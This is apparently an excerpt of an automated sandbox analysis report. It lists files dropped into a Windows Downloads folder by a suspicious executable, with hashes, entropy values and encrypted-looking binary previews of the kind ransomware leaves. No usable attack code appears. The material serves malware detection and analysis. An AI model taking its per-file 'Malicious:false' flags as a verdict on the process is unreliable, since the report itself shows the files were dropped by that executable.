                                                                                                                                                      SHA-512:CFE0F5C102D93E80F8DD7DC2F369C70F056B688125ACD5B4EB10A1F8FCE77CDE5CF4337BCE79D9E8C945BEDE197F95A8AA5C307B7762CC0E62BCA79466BE4825
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .s....3. .P.L.@.....Bt.D*...M..+H..ZX..2.r42...:.X.r.._...N.A@..."%k.K..7\....w.q..u.S...y_...Y]d./t..!R.*.QZ...)...D......^..:U..p....s.Z...F.}K.R.`..k.Ls.:.....acE...mt.X./..Z=.m3.T.h.....$.l.r........L.~.].....#n.j.1J..R.W....S..}.je.,..c@`.w=7...kNC.....R.....\.16D.s.1......h*...n...Mh.....AVOh..h'...M..1.m....U.v)%R.u......<<x.uZ...M,..Al'l......9I.f..i..>du.g+}..,..R3D..t...O..M...a.M.....N...W...OY...=F.......U...!S.{S.yx..L(..P.*...(R...u...&.3.U^...Fw..{U.i&.....8<......!.Q.*..ys~..n...u.....s[.......9TP.....v.f..b....O..a.q...."%+.C...x...j..|....X...._=......?.9Zh>=Z.*<..7U.Vb.v......E............B..m....q.]...Qy...V....D..4.i-.!!..[..3;C.1..Tl.O..ru...<.=.dQU..L.....s.{.....G..M..m.<...&4U.....3.-.....N.Gg.Q.s".G.!..K4....X...;-.~..[....t.< C..?.....k.+..u..91...M..6..8.u.5..}.......`.u-..,=..,.....>....n..mhE..^..;UU.9..&..UI.$.=8,ym.`...#..f\..d`y..t...U."(......w..Jr.jc...m){c.)Y.O..+.)....W..P......4....].*s.jU..5..N..v`...
                                                                                                                                                      C:\Users\user\Downloads\EFOYFBOLXA.pdf.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.014712898055641
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:9/9cYBcgvmKB5cekPt3OKYa6qDyqIx/zCwgck38kI:UYSgvhBGe4tpYJVJzTEFI
                                                                                                                                                      MD5:A1E562FF299252B16F49BB5761C04B2F
                                                                                                                                                      SHA1:195C0B7EBF0BEAF2BB344454F9A5E904DB9A1AE5
                                                                                                                                                      SHA-256:C5878440854AF0B7CF21F1354FF4AFD48C8E33DECB697E17286BEB853FA90043
                                                                                                                                                      SHA-512:CFE0F5C102D93E80F8DD7DC2F369C70F056B688125ACD5B4EB10A1F8FCE77CDE5CF4337BCE79D9E8C945BEDE197F95A8AA5C307B7762CC0E62BCA79466BE4825
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .s....3. .P.L.@.....Bt.D*...M..+H..ZX..2.r42...:.X.r.._...N.A@..."%k.K..7\....w.q..u.S...y_...Y]d./t..!R.*.QZ...)...D......^..:U..p....s.Z...F.}K.R.`..k.Ls.:.....acE...mt.X./..Z=.m3.T.h.....$.l.r........L.~.].....#n.j.1J..R.W....S..}.je.,..c@`.w=7...kNC.....R.....\.16D.s.1......h*...n...Mh.....AVOh..h'...M..1.m....U.v)%R.u......<<x.uZ...M,..Al'l......9I.f..i..>du.g+}..,..R3D..t...O..M...a.M.....N...W...OY...=F.......U...!S.{S.yx..L(..P.*...(R...u...&.3.U^...Fw..{U.i&.....8<......!.Q.*..ys~..n...u.....s[.......9TP.....v.f..b....O..a.q...."%+.C...x...j..|....X...._=......?.9Zh>=Z.*<..7U.Vb.v......E............B..m....q.]...Qy...V....D..4.i-.!!..[..3;C.1..Tl.O..ru...<.=.dQU..L.....s.{.....G..M..m.<...&4U.....3.-.....N.Gg.Q.s".G.!..K4....X...;-.~..[....t.< C..?.....k.+..u..91...M..6..8.u.5..}.......`.u-..,=..,.....>....n..mhE..^..;UU.9..&..UI.$.=8,ym.`...#..f\..d`y..t...U."(......w..Jr.jc...m){c.)Y.O..+.)....W..P......4....].*s.jU..5..N..v`...
                                                                                                                                                      C:\Users\user\Downloads\EIVQSAOTAQ.png
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):6.998006564094491
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:aYxNt3/bNCgh9scStwgC/IkvZnzCwgck38O:agt3Rph9syA4xzTEF
                                                                                                                                                      MD5:031D4B10B57D4EE87E895CA85E44AECD
                                                                                                                                                      SHA1:447D608814732CE6B1AE2393B68F41FEC5B04EB1
                                                                                                                                                      SHA-256:CC99981AF3C3575FE739D9864115BA5D33787B8847FFF140A17CA6743A2688FE
                                                                                                                                                      SHA-512:CF4C9494DEFD16064E0AAF82AC0A3081F9B311F61997FBF4AC279608BBAA731DE2512A0F14ABB4693A010726053DC4B6672BF7D57DD3B9A0C4625716159157FB
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .>m....e..l..{...Z...py..'.H.M.{.b.{.........O..IX6...."..a%..%...@.o..T.j*.kR....={.4&[.|#mR.C..9....'G R..]p|..OUH;I2..$r".n.#.....F&..A.z.B..qg.T...:.q..3.......LS.*...l.!.$UC_I..v./[..y. .E.....Or]..8.#...1. {7(B{.....T..s...8...H.....G..Y0.?9.^E..j...R..#vrP.L..%...?I...........l....x..j?....Cb..x....0So..}.7.V.-:..+..D0df=..I...../..../5.8%fL.!.M.....w....Y.c}.z.\a.Q..L.5.g.>S..GS.7..cEQ2..yF.E5.,..:.m...zK......6....4..MZj...E...g<......9..-P.|....@d5 .........a._...(io..a.(.^...y.U...7....G..p1d..n(.;.~-r..9.c..y..Y5.r.J.......:Mz...7.=..[.+.....u....).1.j...2B.!...P..K.5..i.ho..[...9.p...4.s...-..*...Q'l{.w....9.G...bx../*.8Q.}.....yB...%+B.....Z....n..<_.....Dy.D.X.._e..\..p...9m9\..].|.XP.....I[.....>B.t.(W^.4F.L}...*.:^`..`......A.=:.|.b...r.D........C...'7.#......V..,....v...{.(.;....F.8...G..Y..f..9......=..?.g......?o.3.u.?).....{.g..P...O.%.\2..87./...`_..6Na.d.c....9Fb........@..O.jW...ak.z.0[....:<...W4*.}G_r..?.l.Z..7/.7[.
                                                                                                                                                      C:\Users\user\Downloads\EIVQSAOTAQ.png.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):6.998006564094491
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:aYxNt3/bNCgh9scStwgC/IkvZnzCwgck38O:agt3Rph9syA4xzTEF
                                                                                                                                                      MD5:031D4B10B57D4EE87E895CA85E44AECD
                                                                                                                                                      SHA1:447D608814732CE6B1AE2393B68F41FEC5B04EB1
                                                                                                                                                      SHA-256:CC99981AF3C3575FE739D9864115BA5D33787B8847FFF140A17CA6743A2688FE
                                                                                                                                                      SHA-512:CF4C9494DEFD16064E0AAF82AC0A3081F9B311F61997FBF4AC279608BBAA731DE2512A0F14ABB4693A010726053DC4B6672BF7D57DD3B9A0C4625716159157FB
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .>m....e..l..{...Z...py..'.H.M.{.b.{.........O..IX6...."..a%..%...@.o..T.j*.kR....={.4&[.|#mR.C..9....'G R..]p|..OUH;I2..$r".n.#.....F&..A.z.B..qg.T...:.q..3.......LS.*...l.!.$UC_I..v./[..y. .E.....Or]..8.#...1. {7(B{.....T..s...8...H.....G..Y0.?9.^E..j...R..#vrP.L..%...?I...........l....x..j?....Cb..x....0So..}.7.V.-:..+..D0df=..I...../..../5.8%fL.!.M.....w....Y.c}.z.\a.Q..L.5.g.>S..GS.7..cEQ2..yF.E5.,..:.m...zK......6....4..MZj...E...g<......9..-P.|....@d5 .........a._...(io..a.(.^...y.U...7....G..p1d..n(.;.~-r..9.c..y..Y5.r.J.......:Mz...7.=..[.+.....u....).1.j...2B.!...P..K.5..i.ho..[...9.p...4.s...-..*...Q'l{.w....9.G...bx../*.8Q.}.....yB...%+B.....Z....n..<_.....Dy.D.X.._e..\..p...9m9\..].|.XP.....I[.....>B.t.(W^.4F.L}...*.:^`..`......A.=:.|.b...r.D........C...'7.#......V..,....v...{.(.;....F.8...G..Y..f..9......=..?.g......?o.3.u.?).....{.g..P...O.%.\2..87./...`_..6Na.d.c....9Fb........@..O.jW...ak.z.0[....:<...W4*.}G_r..?.l.Z..7/.7[.
                                                                                                                                                      C:\Users\user\Downloads\EOWRVPQCCS.jpg
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.004357918122129
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:sVV/eylqROG+0LCZ1R0WjgERzCwgck38B3v:sV1pwOLmCVljvzTEW
                                                                                                                                                      MD5:3F0C3778520A2A1A3734F9BC75434100
                                                                                                                                                      SHA1:8AF0A1894786057FE13F5B4555ED7191B26D496A
                                                                                                                                                      SHA-256:D9C0A91B66FEC7D50849DC65FF4894B75C4314468A0685A6CDCC2A0F68FCA8F1
                                                                                                                                                      SHA-512:F562777AC129752AD10E5AF56E83C2C4A3B7E204FBE7006C8274A7EB49A4CB72061D48A8D6FADA6D19B3D15DDC710B7C0DEAB6B355EDF46BD7CEBD9B68DB6495
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: XT7L.H.=..9.Vp.j..Q..epB.^...}..3..D....L..XO....9.!.3;. =,j...<.>!...~..H..x3.W.5.P.).e..J%....?.....~.....&&<.+~..^...>T....P.>...$I..v..2&.`.Fr..d,.g .}..{._.........(.....1X.R.5...~....u....R..8......M...m._.= *..g.0Y.}Y.9......L+.G4.i.2....Fx......R..j.f..d.L.dqR...wV?.N...-./.O!....._..+..>!/..y.H...X\X$.).......&.x........,........Q..pFs..'"u.Ve..P.j.../...k...mX.N...~..[.....1.y@.U..............FG..vQ.-./L.)Qf... ....p...^...i#L`..t.oQA.>..C..:"..`-Lp.b?J........Z..*9}.m.V6....U.N...e...JZ.......5...x.. ..z9.AO.).+fo(.-b/.....}..#F.....6JG.#.=..D=..z....!..w......Uq./7U2..VX]2..w,..c..: s.7...*=..[`.O.2k.@..9...t..P.......g... /NyhI....kH.P...V...0h.%...TN7...4.O...-...+Q.N.*..B.M.*...0..c........=WR;...y.y|..'....B..H...mm%..Y..6?~.{*.q.@.po..f...T..(E...8....E..d..H%.\...oW..x..>........v...~........:.}..j.S0I.....B.kc..H......./....".........^-....2Z...b.3>.q.}...U.c.p..s|..N`....r....$.q......pU6....Kx?..N.9.<..._..`8.e.Y.
                                                                                                                                                      C:\Users\user\Downloads\EOWRVPQCCS.jpg.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.004357918122129
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:sVV/eylqROG+0LCZ1R0WjgERzCwgck38B3v:sV1pwOLmCVljvzTEW
                                                                                                                                                      MD5:3F0C3778520A2A1A3734F9BC75434100
                                                                                                                                                      SHA1:8AF0A1894786057FE13F5B4555ED7191B26D496A
                                                                                                                                                      SHA-256:D9C0A91B66FEC7D50849DC65FF4894B75C4314468A0685A6CDCC2A0F68FCA8F1
                                                                                                                                                      SHA-512:F562777AC129752AD10E5AF56E83C2C4A3B7E204FBE7006C8274A7EB49A4CB72061D48A8D6FADA6D19B3D15DDC710B7C0DEAB6B355EDF46BD7CEBD9B68DB6495
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: XT7L.H.=..9.Vp.j..Q..epB.^...}..3..D....L..XO....9.!.3;. =,j...<.>!...~..H..x3.W.5.P.).e..J%....?.....~.....&&<.+~..^...>T....P.>...$I..v..2&.`.Fr..d,.g .}..{._.........(.....1X.R.5...~....u....R..8......M...m._.= *..g.0Y.}Y.9......L+.G4.i.2....Fx......R..j.f..d.L.dqR...wV?.N...-./.O!....._..+..>!/..y.H...X\X$.).......&.x........,........Q..pFs..'"u.Ve..P.j.../...k...mX.N...~..[.....1.y@.U..............FG..vQ.-./L.)Qf... ....p...^...i#L`..t.oQA.>..C..:"..`-Lp.b?J........Z..*9}.m.V6....U.N...e...JZ.......5...x.. ..z9.AO.).+fo(.-b/.....}..#F.....6JG.#.=..D=..z....!..w......Uq./7U2..VX]2..w,..c..: s.7...*=..[`.O.2k.@..9...t..P.......g... /NyhI....kH.P...V...0h.%...TN7...4.O...-...+Q.N.*..B.M.*...0..c........=WR;...y.y|..'....B..H...mm%..Y..6?~.{*.q.@.po..f...T..(E...8....E..d..H%.\...oW..x..>........v...~........:.}..j.S0I.....B.kc..H......./....".........^-....2Z...b.3>.q.}...U.c.p..s|..N`....r....$.q......pU6....Kx?..N.9.<..._..`8.e.Y.
                                                                                                                                                      C:\Users\user\Downloads\GIGIYTFFYT.mp3
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):6.986947564034287
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:MpQtELnjpr3wwaSnvFPm/xCkZM1mUYaYh8uqoyV5+zK8sevWAVgKTaCB7RZ0cHYn:uLnFDBauc/xdZ09Yh8upA5+zCwgck38Q
                                                                                                                                                      MD5:EF0850F4DE237963527CA7BAE10D09BA
                                                                                                                                                      SHA1:A30FA8DEEFFB2431D2718656F4B2EFD1E6735EC2
                                                                                                                                                      SHA-256:A353C794F6AB8BD08DB33890B095C14111853DB371BE91CD72B7072297E454C8
                                                                                                                                                      SHA-512:30A808774664A86701F61D8F7DE31A606936DB9644E74CFF1ABC5AC1EBDE94B481962B74143869BF8BD58AA537E5DA81CF718B445C53863ECAF7BEDFD0C92C03
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: -... 8.l....H.j.}......o.@.L=9`.S,.I.1.`,..*.. ....P.<q...^..vh....;.I....M?......<j.E......n....9..q..f.(..yW~.0.j..Y...m.l....$..ok.Y].....;.#k..v...l._...z{.....X.o..9]h4^...i..?..$....a{...."`%r...H..xl...M..".^......!.....\,..........m|ubF.c...Ek#...K,...=...R..#...r.$...s.i.B......z..`}.......^v...W...|...{...<.bT8...o.....9.J.b .4.o.?..?........Q.2.B.s.1....RD0.J.[...b#......"...Edx%..h..xd.8Y.+..=..$_...Q....3.A.^...hS.n.b...q.....^..X.]X..y.C.8..jH...........:.B.Z{.A...a....<.X.3.....1.Qj...]o..4.2f..$5...d.U.h...U.7..4.......DL...C.$EDm.#........X}R?.Z...U.,.cSFI....s.O.P..fS.ba.T@........%.q.6.0.H.w.FU...r.u.k8....^Z.Y..\ux>'.\.F......R>.s.4D..0.......G(qSr.H...yp.......K.....!....r.....\.;q......U.2. ......T..%.....-F.u.........8...B.....e.1.V.a.".....o...;.....xq.6.:....v5HP~...4....[.#..-lG4....$@.9DJ..0,..g.y.Q..A. ...%...P..%..#....s..i.W.;...:~.A.H.>bz..]."..9Z..k.h..K'..7.i....5.[..S.....H..p.n.<....[...a....I.......T&..< ..
                                                                                                                                                      C:\Users\user\Downloads\GIGIYTFFYT.mp3.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):6.986947564034287
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:MpQtELnjpr3wwaSnvFPm/xCkZM1mUYaYh8uqoyV5+zK8sevWAVgKTaCB7RZ0cHYn:uLnFDBauc/xdZ09Yh8upA5+zCwgck38Q
                                                                                                                                                      MD5:EF0850F4DE237963527CA7BAE10D09BA
                                                                                                                                                      SHA1:A30FA8DEEFFB2431D2718656F4B2EFD1E6735EC2
                                                                                                                                                      SHA-256:A353C794F6AB8BD08DB33890B095C14111853DB371BE91CD72B7072297E454C8
                                                                                                                                                      SHA-512:30A808774664A86701F61D8F7DE31A606936DB9644E74CFF1ABC5AC1EBDE94B481962B74143869BF8BD58AA537E5DA81CF718B445C53863ECAF7BEDFD0C92C03
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: -... 8.l....H.j.}......o.@.L=9`.S,.I.1.`,..*.. ....P.<q...^..vh....;.I....M?......<j.E......n....9..q..f.(..yW~.0.j..Y...m.l....$..ok.Y].....;.#k..v...l._...z{.....X.o..9]h4^...i..?..$....a{...."`%r...H..xl...M..".^......!.....\,..........m|ubF.c...Ek#...K,...=...R..#...r.$...s.i.B......z..`}.......^v...W...|...{...<.bT8...o.....9.J.b .4.o.?..?........Q.2.B.s.1....RD0.J.[...b#......"...Edx%..h..xd.8Y.+..=..$_...Q....3.A.^...hS.n.b...q.....^..X.]X..y.C.8..jH...........:.B.Z{.A...a....<.X.3.....1.Qj...]o..4.2f..$5...d.U.h...U.7..4.......DL...C.$EDm.#........X}R?.Z...U.,.cSFI....s.O.P..fS.ba.T@........%.q.6.0.H.w.FU...r.u.k8....^Z.Y..\ux>'.\.F......R>.s.4D..0.......G(qSr.H...yp.......K.....!....r.....\.;q......U.2. ......T..%.....-F.u.........8...B.....e.1.V.a.".....o...;.....xq.6.:....v5HP~...4....[.#..-lG4....$@.9DJ..0,..g.y.Q..A. ...%...P..%..#....s..i.W.;...:~.A.H.>bz..]."..9Z..k.h..K'..7.i....5.[..S.....H..p.n.<....[...a....I.......T&..< ..
                                                                                                                                                      C:\Users\user\Downloads\GRXZDKKVDB.jpg
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):6.984976631817113
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:boDhRAGV218aJ4aHXNbO8/lEDd6kQACd4zCwgck38S:bWRdV2HtnlfLSzTE9
                                                                                                                                                      MD5:B5696D63D2975E9BBAAA9E676E0A70BF
                                                                                                                                                      SHA1:58F99467746C4284DB0921FE14876E73DDDC0AD3
                                                                                                                                                      SHA-256:C4317AE3C7B9D8AE61D8A7070E35AAA564BC8DEFD19262E58E39EF84F4C48EA9
                                                                                                                                                      SHA-512:703EE088AAF3639A658E47CDE0FEBDEF351B0E192503C3A78DB6DECB7B64B1FD218B7977CE8D14463E73334925EC38B2637D753BAEF4CD9D63AA9634B181D669
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .u..ST..wv.".0.ke.......M.P...K............L.XP5..[.5Rf............xlbXP=.ne....mA..3....1R...Ig.....@....(`...u.X....e.C]......{.......lV..v.w\0.D........bys3....ji\.....X0S0..M.6.?~%.8(.LOhg.aQ6.w.t...nBi..K..4+z}u.wg.]\Z?..IU..8..)..E|..."..o.g..|....C..X.P...b....T....%.X.$1.c.(.O...L..* ...([.W.....7.|\...5`..A..............vc9....d&.x......S...S..^.!.`.Q0V.3LM.7.e...MjL..V.v....`.J.F.6.k....Q(...d.tN. ...N.'.7.$.r/l...Q...~.)..r\...2.Ut...-.1. .."...A..<.k.....!=...?..?G..].?9$...`..z..&....&G..k.D..)...[.Y.....M+....o$..D.s.N..J=f0.....^.#..{..........y.t...(..O....H1.x.c|."..bJ.N....OP...#xy.M.....Tq.......c"...s.Gf+.x....(.L.-....0V_cT..u...+.b.M...9/V....i.4'%e...l[......L5x..Z....E..].C..........1...('4....c+..i..C'/....<..)...WI...|....4l..~.x`....6......m..E:.]c...;6..>`t.T.H....7.wC...k.Np...c%fH.....Tz...F}Z.B..5..I{G...g......$.q9s..D...{U}.n..@.Mo..e...M.,<......9.[...8..%uF.:Me...j,.EW....'D/a6.F..s.......p
                                                                                                                                                      C:\Users\user\Downloads\GRXZDKKVDB.jpg.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):6.984976631817113
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:boDhRAGV218aJ4aHXNbO8/lEDd6kQACd4zCwgck38S:bWRdV2HtnlfLSzTE9
                                                                                                                                                      MD5:B5696D63D2975E9BBAAA9E676E0A70BF
                                                                                                                                                      SHA1:58F99467746C4284DB0921FE14876E73DDDC0AD3
                                                                                                                                                      SHA-256:C4317AE3C7B9D8AE61D8A7070E35AAA564BC8DEFD19262E58E39EF84F4C48EA9
                                                                                                                                                      SHA-512:703EE088AAF3639A658E47CDE0FEBDEF351B0E192503C3A78DB6DECB7B64B1FD218B7977CE8D14463E73334925EC38B2637D753BAEF4CD9D63AA9634B181D669
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .u..ST..wv.".0.ke.......M.P...K............L.XP5..[.5Rf............xlbXP=.ne....mA..3....1R...Ig.....@....(`...u.X....e.C]......{.......lV..v.w\0.D........bys3....ji\.....X0S0..M.6.?~%.8(.LOhg.aQ6.w.t...nBi..K..4+z}u.wg.]\Z?..IU..8..)..E|..."..o.g..|....C..X.P...b....T....%.X.$1.c.(.O...L..* ...([.W.....7.|\...5`..A..............vc9....d&.x......S...S..^.!.`.Q0V.3LM.7.e...MjL..V.v....`.J.F.6.k....Q(...d.tN. ...N.'.7.$.r/l...Q...~.)..r\...2.Ut...-.1. .."...A..<.k.....!=...?..?G..].?9$...`..z..&....&G..k.D..)...[.Y.....M+....o$..D.s.N..J=f0.....^.#..{..........y.t...(..O....H1.x.c|."..bJ.N....OP...#xy.M.....Tq.......c"...s.Gf+.x....(.L.-....0V_cT..u...+.b.M...9/V....i.4'%e...l[......L5x..Z....E..].C..........1...('4....c+..i..C'/....<..)...WI...|....4l..~.x`....6......m..E:.]c...;6..>`t.T.H....7.wC...k.Np...c%fH.....Tz...F}Z.B..5..I{G...g......$.q9s..D...{U}.n..@.Mo..e...M.,<......9.[...8..%uF.:Me...j,.EW....'D/a6.F..s.......p
                                                                                                                                                      C:\Users\user\Downloads\GRXZDKKVDB.xlsx
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.02055318662654
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:ofzTzz3I6naSxn3bC2cddKl5BdlzCwgck38t59m:oTz3I6ak3+D8nzTESTm
                                                                                                                                                      MD5:6D1539C63C817F3F20347BCC0CEE9EA0
                                                                                                                                                      SHA1:5231C30FFBFCB7915E7FD85F466432A0D31CA94F
                                                                                                                                                      SHA-256:44A9063514CE1057AB37F37D6F308A937F78965832878D6FB459A3642B46B5A5
                                                                                                                                                      SHA-512:A0FF49F9F22E2CDF1080F48F016AED5ABD99E33C090A5F09571E2C20A9100F1DEC84A09FE9ADCADE0AE657F0EA920DFC444125ECD6CF6FDE82A17E5F3A8D35D5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: }2.J.D....B...U.#.~.c$(..{Ni>p.=.o...r>_)..f..>L.#Pt.kA.q2..U.....b..n.v:.W.'...e.....K,ns..G.>R.F..]......4....o..r`....vX...b{.v.Lg.].a..S?...LUU.*.[...QY&M}..q.....]n....9+.q.P.*.i...=.pXph0..".N^...M....~1Sj..ae.....m..l..\`.......]..:P...`L.#.S.v....w.t....S...u.+&...H.i.}..H6.....0.u.E4q..'J.5......St.K.@i.Ys...@4x..4.....BK.%.d...0.. ...%j...."0cC.LC..X..>..i..c~4(.Dc|:d!.+E...${.....}.A..Jq.. ...+V..r.Wz..........B.4.Y.N.n(.0.D.S.}...(T...MQ*.."J_..h.9=.....5.%.u...tA.C....!T.a6..^.....V24.}e..5].j......z#.?.u..,0...9.K. ..<.`......^.....@..{..&vy....8 >N...../h`K..Yk..$..T&u.N!F.g%h,..J.f.|.{..Vf{..bxg9.....;a.%.jV)....6.8.......Q.?....-Q....0...;a........p.v4...t..DhY..,.z{...0"..z*..6p.u...rl..&....y......5..[........,.....-.i!.S.>C....g..Q....>.o.ZL..(..h.6....Tf......-......N{.N....w...RR..rP.~l..;...<......{../.....D....UN;....9.....4\..gX(...._.|c.....:.....=.@@..........V..".M........w.-\..b...r.....WF.i.L#!..NX.6;...I....U..@
                                                                                                                                                      C:\Users\user\Downloads\GRXZDKKVDB.xlsx.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.02055318662654
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:ofzTzz3I6naSxn3bC2cddKl5BdlzCwgck38t59m:oTz3I6ak3+D8nzTESTm
                                                                                                                                                      MD5:6D1539C63C817F3F20347BCC0CEE9EA0
                                                                                                                                                      SHA1:5231C30FFBFCB7915E7FD85F466432A0D31CA94F
                                                                                                                                                      SHA-256:44A9063514CE1057AB37F37D6F308A937F78965832878D6FB459A3642B46B5A5
                                                                                                                                                      SHA-512:A0FF49F9F22E2CDF1080F48F016AED5ABD99E33C090A5F09571E2C20A9100F1DEC84A09FE9ADCADE0AE657F0EA920DFC444125ECD6CF6FDE82A17E5F3A8D35D5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: }2.J.D....B...U.#.~.c$(..{Ni>p.=.o...r>_)..f..>L.#Pt.kA.q2..U.....b..n.v:.W.'...e.....K,ns..G.>R.F..]......4....o..r`....vX...b{.v.Lg.].a..S?...LUU.*.[...QY&M}..q.....]n....9+.q.P.*.i...=.pXph0..".N^...M....~1Sj..ae.....m..l..\`.......]..:P...`L.#.S.v....w.t....S...u.+&...H.i.}..H6.....0.u.E4q..'J.5......St.K.@i.Ys...@4x..4.....BK.%.d...0.. ...%j...."0cC.LC..X..>..i..c~4(.Dc|:d!.+E...${.....}.A..Jq.. ...+V..r.Wz..........B.4.Y.N.n(.0.D.S.}...(T...MQ*.."J_..h.9=.....5.%.u...tA.C....!T.a6..^.....V24.}e..5].j......z#.?.u..,0...9.K. ..<.`......^.....@..{..&vy....8 >N...../h`K..Yk..$..T&u.N!F.g%h,..J.f.|.{..Vf{..bxg9.....;a.%.jV)....6.8.......Q.?....-Q....0...;a........p.v4...t..DhY..,.z{...0"..z*..6p.u...rl..&....y......5..[........,.....-.i!.S.>C....g..Q....>.o.ZL..(..h.6....Tf......-......N{.N....w...RR..rP.~l..;...<......{../.....D....UN;....9.....4\..gX(...._.|c.....:.....=.@@..........V..".M........w.-\..b...r.....WF.i.L#!..NX.6;...I....U..@
                                                                                                                                                      C:\Users\user\Downloads\NVWZAPQSQL.docx
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):6.994896452289026
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:0oOoQ+Oim3ScYwycbFzI/+es1NMMq0NzCwgck38k:TQ+OVjycJvNMMq0NzTEz
                                                                                                                                                      MD5:FA723B24DC63DA4B76B738E575016ACF
                                                                                                                                                      SHA1:119AB3F94170F1522AC82AB09B912A4F378E6E18
                                                                                                                                                      SHA-256:D4AF21470365B82C07B61BB8D10AB09CAA8CCC7F75718D5ABD0558AD04E8CC12
                                                                                                                                                      SHA-512:1B6956DA227EC38B4415B8F214F857EBAD0537DF1D8164965A9DDBD645D2D062BD8E0E6FE6F5C9F5E49B8B3D64D4A8B2519E3690CDC0970BFC7BF0A6D0C2ED2E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: fa.U....s._o.g>.E..I.......J._<(L.x)..].(.5Y.\.7S.q.Q.Q..IP.*..W.W-).#...).t.dC.....<V.....K..".*.4$............;W....L.C<.W......i*..I.w.P?..j.V[z......T.)U..z...?_9...vW..V..7q..RR....._*....C..F..\.bB.........7...[.!|..k_...F~.....I. ....z.(>R...y.)sYh.Ue....R...].`T7D..~..e..<:.I.=/L..y6z....D..8.-UAc.....>......p.hH._..-.L.b............3%+~9.h.G.&..Z.2...}....18.AG..T..E..n|(..+..1.HB6/B8...J...*{..C7...01.s...~.H%.(\j........:...>"..&.Lu\..?...LQ.`>}.<.P..@......S.)....1..q$..?.3Pw[.z#....L.....2....K.....z{1....a....S.G.q...l..:.i..].....7d?qB..,N.l...Q.`V.K......].4...7\..\5...KtJ.)..T.R..j3.p@......'*j..X..[~.......Gl.......d....-c....B0z.......q... ....U....\.`..@..G3..T.+e......v..0....s.)P.Z......`...Z.3.L......QHt.j...w.s?.d.7.FVK.Pd...........){....x.3.........5K.~Wy@UH.}....}H...e..eC^.bS..s.._....m...b.re.Dc.....=....Z.z.....n...~.*.t3y..%p:27.P.^. .Ww.).R....L.h..Bjv.aS.....<.ar..DM..|...1..Q.k~...d.z..ty\-....O.s
                                                                                                                                                      C:\Users\user\Downloads\NVWZAPQSQL.docx.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
